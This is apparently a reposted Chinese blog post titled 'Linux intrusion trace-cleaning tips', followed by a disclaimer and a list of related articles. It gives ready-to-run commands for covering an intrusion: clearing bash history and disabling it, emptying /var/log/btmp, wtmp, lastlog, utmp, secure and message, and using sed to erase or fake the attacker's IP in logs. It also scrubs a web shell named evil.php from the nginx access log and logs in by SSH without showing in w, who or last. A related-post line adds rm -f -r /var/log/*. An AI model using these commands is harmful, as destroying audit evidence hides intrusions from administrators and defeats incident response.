清除history历史命令记录

vim ~/.bash_history

//编辑history记录文件,删除部分不想被保存的历史命令

history -c

//清除当前用户的history命令记录

HISTSIZE=0

//通过修改配置文件/etc/profile,使系统不再保存命令记录

清除系统日志痕迹

  • Linux 系统存在多种日志文件,来记录系统运行过程中产生的日志。
/var/log/btmp   记录所有登录失败信息,使用lastb命令查看

/var/log/lastlog 记录系统中所有用户最后一次登录时间的日志,使用lastlog命令查看

/var/log/wtmp    记录所有用户的登录、注销信息,使用last命令查看

/var/log/utmp    记录当前已经登录的用户信息,使用w,who,users等命令查看

/var/log/secure   记录与安全相关的日志信息

/var/log/message  记录系统启动后的信息和错误日志
  • 清空日志文件
[root@centos]# echo > /var/log/btmp

[root@centos]# lastb

//清除登陆系统失败的记录,查询不到登录失败信息

[root@centos]# echo > /var/log/wtmp

[root@centos]# last

//清除登录系统成功的记录,查询不到登录成功的信息

清除用户最后一次登录时间:echo > /var/log/lastlog          #lastlog命令

清除当前登录用户的信息:echo >   /var/log/utmp             #使用w,who,users等命令

清除安全日志记录:cat /dev/null >  /var/log/secure

清除系统日志记录:cat /dev/null >  /var/log/message
  • 删除/替换部分日志

    日志文件全部被清空,太容易被管理员察觉了,如果只是删除或替换部分关键日志信息,那么就可以完美隐藏攻击痕迹。
sed  -i '/自己的ip/'d  /var/log/messages

//删除所有匹配到字符串的行,比如以当天日期或者自己的登录ip

sed -i 's/192.168.166.85/192.168.1.1/g' secure

//全局替换登录IP地址

清除web入侵痕迹

sed -i 's/192.168.166.85/192.168.1.1/g' access.log

//直接替换日志IP地址

cat /var/log/nginx/access.log | grep -v evil.php > tmp.log

//使用grep -v来把我们的相关信息删除

cat tmp.log > /var/log/nginx/access.log/

//把修改过的日志覆盖到原日志文件

文件安全删除工具

实现安全的从硬盘上擦除数据,默认覆盖3次,通过 -n指定数据覆盖次数。

隐藏远程SSH登陆记录

ssh -T root@192.168.0.1 /bin/bash -i

//隐身登录系统,不会被w、who、last等指令检测到

ssh -o UserKnownHostsFile=/dev/null -T user@host /bin/bash –i

//不记录ssh公钥在本地.ssh目录中

转载链接

bypass-Linux 入侵痕迹清理技巧

声明

严禁读者利用以上介绍知识点对网站进行非法操作 , 本文仅用于技术交流和学习 , 如果您利用文章中介绍的知识对他人造成损失 , 后果由您自行承担 , 如果您不能同意该约定 , 请您务必不要阅读该文章 , 感谢您的配合 !

Linux 入侵痕迹清理技巧的更多相关文章

  1. Linux之入侵痕迹清理总结

    rm -f -r /var/log/*rm .bash_historyrm recently_used

  2. Linux入侵痕迹检测方案【华为云技术分享】

    背景说明 扫描是一切入侵的基础,通过扫描来发现目标主机是否为活动主机.操作系统是什么版本.开放了哪些服务等.扫描技术纷繁复杂,新的扫描技术也层出不穷,不可能穷举所有扫描技术,下面按入侵步骤对主机扫描. ...

  3. WINDOWS之入侵痕迹清理总结

    Windows的日志文件通常有应用程序日志,安全日志.系统日志.DNS服务器日志.FTP日志.WWW日志等等. 应用程序日志文件:%systemroot%\system32\config\AppEve ...

  4. linux入侵控制与痕迹清理

    后门 (1)开机自动反弹shell (2)linux后门 Rookit 目前常用的有:t0rn /mafix/enyelkm 等 mafix rootkit Mafix是一款常用的轻量应用级别Root ...

  5. 最有用的Linux命令行使用技巧集锦

    最近在Quora上看到一个问答题目,关于在高效率Linux用户节省时间Tips.将该题目的回答进行学习总结,加上自己的一些经验,记录如下,方便自己和大家参考. 下面介绍的都是一些命令行工具,这些工具在 ...

  6. linux 常用命令及技巧

    linux 常用命令及技巧 linux 常用命令及技巧:linux 常用命令总结: 一. 通用命令: 1. date :print or set the system date and time 2. ...

  7. linux磁盘清理方法 Linux 下垃圾清理工具 BleachBit

    由于当初安装系统设计不合理,有些分区的过小,以及网络通讯故障等造成日志文件速度增长等其他原因都可以表现为磁盘空间满,造成无法读写磁盘,应用程序无法执行等.下面就给你支几招(以/home空间满为例): ...

  8. 注册表中LEGACY残留项的清理技巧

    http://bbs.kafan.cn/thread-889517-1-1.html 注册表中LEGACY残留项的清理技巧 2.Windows Vista系统 Windows XP系统下的修改权限的方 ...

  9. Linux 入侵检测小结

    Linux  入侵检测小结 0x00 审计命令 在linux中有5个用于审计的命令: last:这个命令可用于查看我们系统的成功登录.关机.重启等情况:这个命令就是将/var/log/wtmp文件格式 ...

随机推荐

  1. xpath取末尾

    from lxml import etree html = ''' <!DOCTYPE html> <html lang="en"> <head> ...

  2. navicate premium黄色版本破解下载

    百度网盘下载 提取码: tsua 按照电脑安装32位或者64位 安装完成后点击最后一个进行破解汉化

  3. ElementUI级联选择器动态加载Demo

    嗯,今天项目遇到,弄了一会,这里分享一下,不足之处请小伙伴指出来, 官网Demo: <el-cascader :props="props"></el-cascad ...

  4. java 第二课 标识符

    Java 标识符为字母.数字.下划线.dollar符 变量不能以数字开头 包名小写 类.接口首字母大写 方法首字母小写 全局变量首字母小写 局部变量首字母大写 常量大写,单词间用下划线隔开 Java中 ...

  5. Vue基础(2)

    fetch与axios请求数据 fetch基本语法: fetch(url,{parmas}).then(res=> res.json()  //返回promise对象 ).then(data=& ...

  6. poj 2229 一道动态规划思维题

    http://poj.org/problem?id=2229 先把题目连接发上.题目的意思就是: 把n拆分为2的幂相加的形式,问有多少种拆分方法. 看了大佬的完全背包代码很久都没懂,就照着网上的写了动 ...

  7. Hibernate注解实体类

    Hibernate注解1.@Entity(name="EntityName")必须,name为可选,对应数据库中一的个表2.@Table(name="",cat ...

  8. SpringMVC+Spring+MyBatis个人技术博客源码

    项目描述 Hi,大家好,又到了源码分享时间啦,今天我们分享的源码一个<个人技术博客>,该博客是基于SSM实现的一个个人博客系统,适合初学SSM和个人博客制作的同学学习.有了这个源码,直接买 ...

  9. Luogu P4546 [THUWC2017]在美妙的数学王国中畅游

    题意 题意奇奇怪怪,这里就不写了. \(\texttt{Data Range:}1\leq n\leq 10^5,1\leq m\leq 2\times 10^5\) 题解 为什么你们都是卡在数学方面 ...

  10. SourceTree安装及卸载

    一.安装步骤 下载地址: 链接:https://pan.baidu.com/s/1K5ImZASuThJZoGLz6Ay_4g 提取码:hqkp 1. 点击安装包,点击下一步 2. 出现账户注册的页面 ...